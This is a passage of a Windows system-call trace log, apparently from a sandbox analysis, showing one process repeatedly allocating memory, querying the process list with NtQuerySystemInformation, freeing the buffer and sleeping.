FreeType=0x8000) returned 0x0 [0242.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.653] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.681] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 